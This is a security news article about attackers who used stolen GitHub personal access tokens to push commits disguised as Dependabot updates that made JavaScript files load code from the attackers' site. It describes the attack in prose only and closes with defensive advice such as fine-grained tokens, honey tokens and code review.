Supply Chain Attackers Take Advantage of Dependabot on GitHub

Malicious Code Updates Target GitHub Repositories in Software Supply Chain Attack

Overview

In a recent attack on software supply chains, threat actors exploited stolen passcodes to inject malicious code updates into hundreds of GitHub repositories. The attackers used stolen personal access tokens (PATs) to commit code changes, leveraging the name of a popular tool called Dependabot to deceive developers into accepting the updates. The campaign involved appending code to Javascript files, which would then load and execute code from the attacker’s site. This attack represents a new approach in deceiving developers through impersonation, creating significant concern about the security of code repositories.

Impersonation and Deception

The attackers strategically targeted GitHub repositories, capitalizing on the trust associated with Dependabot. Dependabot is an automated tool acquired by GitHub in 2019 to perform regular software and security checks for projects hosted on the platform. By making code submissions appear as if they were made by Dependabot, the attackers aimed to avoid scrutiny by developers who generally accept Dependabot‘s requests without thorough verification.

Given the reliance on stolen PATs, GitHub has emphasized that its systems were not compromised in this attack, and there is no evidence to suggest that GitHub users are at immediate risk. However, it highlights the need for developers to secure their accounts and implement the principle of least privilege to mitigate such risks.

Protecting Software Development Pipelines

To safeguard their software development pipelines against similar attacks, developers should prioritize the hardening of their systems. GitHub has already begun scanning all public repositories for developer secrets, such as passwords and security tokens, and has mandated two-factor authentication for all developer accounts. However, these measures alone may not be sufficient.

In order to determine the trustworthiness of a project, developers should not solely rely on project attributes, such as the number of developers or commits. Researchers have demonstrated that signals and metadata used to assess project trustworthiness can be forged, potentially leading to the unwitting distribution of malicious code. Companies should adopt additional security measures, such as honey tokens, which involve planting fake credentials throughout development environments to detect illegitimate access attempts.

Furthermore, developers should carefully analyze the code from the packages they are using to identify any potential insertion of malicious code into the supply chain. This can be achieved through robust code reviews and continuous monitoring of dependencies.

Recommendations and Conclusion

Both GitHub and developers must take proactive steps to enhance security in software supply chains. GitHub should provide every user with access to their security access logs, a feature currently limited to enterprise users. This would allow users to trace any suspicious activity and address potential vulnerabilities promptly.

Developers should prioritize securing their accounts by implementing fine-grained access controls and opting for tokens with restricted privileges instead of classic tokens. It is crucial to adopt a holistic approach to security, combining measures such as code analysis, regular vulnerability checks, and continuous monitoring of package dependencies.

Software supply chain attacks like these highlight the evolving nature of cyber threats and the need for constant vigilance. Maintaining strong security practices is essential to prevent the insertion of malicious code into widely-used software repositories, safeguarding the integrity of code and protecting users from potential harm.